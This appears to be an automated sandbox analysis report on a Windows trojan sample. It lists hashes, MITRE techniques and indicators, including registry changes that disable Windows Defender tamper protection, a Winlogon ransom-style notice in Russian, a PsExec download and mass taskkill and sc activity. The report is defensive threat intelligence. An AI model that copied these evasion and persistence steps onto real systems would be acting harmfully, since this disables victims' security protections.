34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89

Resubmissions

29-10-2021 09:15

211029-k7w6esdad6 10

24-08-2021 15:41

210824-hbt188jvma 10

Analysis

max time kernel
151s
max time network
122s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 09:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Size

366KB
MD5

a24e438b9535cfb06f66dbd5b11a7680
SHA1

f998c708668743677064db9307cf274c17dd9a5a
SHA256

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89
SHA512

b65c5fac207297fe0219f03779729789de443880b1d71f099ec29a17183f37a1d9d8f1f2d4484f5fc95fa647562fd565e20a1f4a81b61d89e078a8405f41c5fa

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 34 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 6 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2820 icacls.exe
3724 icacls.exe
3948 icacls.exe
2416 icacls.exe
1092 icacls.exe
3496 icacls.exe

description	flow	ioc
HTTP URL	34	http://live.sysinternals.com/PsExec.exe

pid	process
2820	icacls.exe
3724	icacls.exe
3948	icacls.exe
2416	icacls.exe
1092	icacls.exe
3496	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
File opened (read-only)	\??\W:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\E:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\T:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\U:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\K:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\B:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\M:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\O:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\A:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\N:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Q:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\R:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Y:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\F:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\Z:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\X:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\V:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\I:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\P:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\S:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\G:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\H:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\J:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
File opened (read-only)	\??\L:	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 icanhazip.com

flow	ioc
29	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Внимание Внимание Внимание!\r\n\r\nДобрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!"	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Drops file in Windows directory 13 IoCs

Processes:

netsh.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2028	taskkill.exe
1204	taskkill.exe
816	taskkill.exe
1908	taskkill.exe
2112	taskkill.exe
3992	taskkill.exe
2124	taskkill.exe
3988	taskkill.exe
808	taskkill.exe
1028	taskkill.exe
3648	taskkill.exe
2316	taskkill.exe
1576	taskkill.exe
3972	taskkill.exe
3648	taskkill.exe
3112	taskkill.exe
3328	taskkill.exe
1464	taskkill.exe
1732	taskkill.exe
2500	taskkill.exe
1608	taskkill.exe
2428	taskkill.exe
3408	taskkill.exe
2984	taskkill.exe
948	taskkill.exe
1828	taskkill.exe
3456	taskkill.exe
1364	taskkill.exe
2168	taskkill.exe
3852	taskkill.exe
2472	taskkill.exe
1848	taskkill.exe
3580	taskkill.exe
336	taskkill.exe
2416	taskkill.exe
1720	taskkill.exe
1404	taskkill.exe
2812	taskkill.exe
1872	taskkill.exe
2628	taskkill.exe
3868	taskkill.exe
2624	taskkill.exe
3928	taskkill.exe
968	taskkill.exe
2168	taskkill.exe
2228	taskkill.exe
2960	taskkill.exe
3764	taskkill.exe
2024	taskkill.exe
1800	taskkill.exe
2820	taskkill.exe
2108	taskkill.exe
2628	taskkill.exe
2736	taskkill.exe
2492	taskkill.exe
2776	taskkill.exe
2716	taskkill.exe
720	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3096 reg.exe

pid	process
3096	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

pid	process
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	948	taskkill.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	3868	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	2228	Conhost.exe
Token: SeDebugPrivilege	808	Conhost.exe
Token: SeDebugPrivilege	3328	taskkill.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	720	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1732	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	3992	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	3580	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	3928	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	3852	taskkill.exe
Token: SeDebugPrivilege	2736	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	1028	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	2112	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	3408	taskkill.exe
Token: SeDebugPrivilege	2500	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	2628	taskkill.exe
Token: SeDebugPrivilege	3444	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	pid	process	target process
PID 2748 wrote to memory of 3548	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2748 wrote to memory of 3548	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2748 wrote to memory of 3548	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2748 wrote to memory of 668	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2748 wrote to memory of 668	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2748 wrote to memory of 668	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	powershell.exe
PID 2748 wrote to memory of 2984	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2984	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2984	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 3176	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2748 wrote to memory of 3176	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2748 wrote to memory of 3176	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2748 wrote to memory of 3096	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 2748 wrote to memory of 3096	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 2748 wrote to memory of 3096	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	reg.exe
PID 2748 wrote to memory of 3724	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 2748 wrote to memory of 3724	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 2748 wrote to memory of 3724	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	schtasks.exe
PID 2748 wrote to memory of 916	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 916	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 916	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3468	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2748 wrote to memory of 3468	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2748 wrote to memory of 3468	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2748 wrote to memory of 3352	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3352	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3352	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 2908	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2748 wrote to memory of 2908	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2748 wrote to memory of 2908	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	netsh.exe
PID 2748 wrote to memory of 3760	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3760	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3760	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3944	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3944	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 3944	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 1964	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 1964	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 1964	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 64	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 64	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 64	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	sc.exe
PID 2748 wrote to memory of 1800	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 1800	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 1800	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 336	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 336	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 336	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 948	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 948	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 948	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2316	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2316	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2316	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 3868	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 3868	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 3868	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2168	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2168	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2168	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe
PID 2748 wrote to memory of 2228	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2748 wrote to memory of 2228	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2748 wrote to memory of 2228	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	Conhost.exe
PID 2748 wrote to memory of 3328	2748	34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89.exe

description	ioc	process
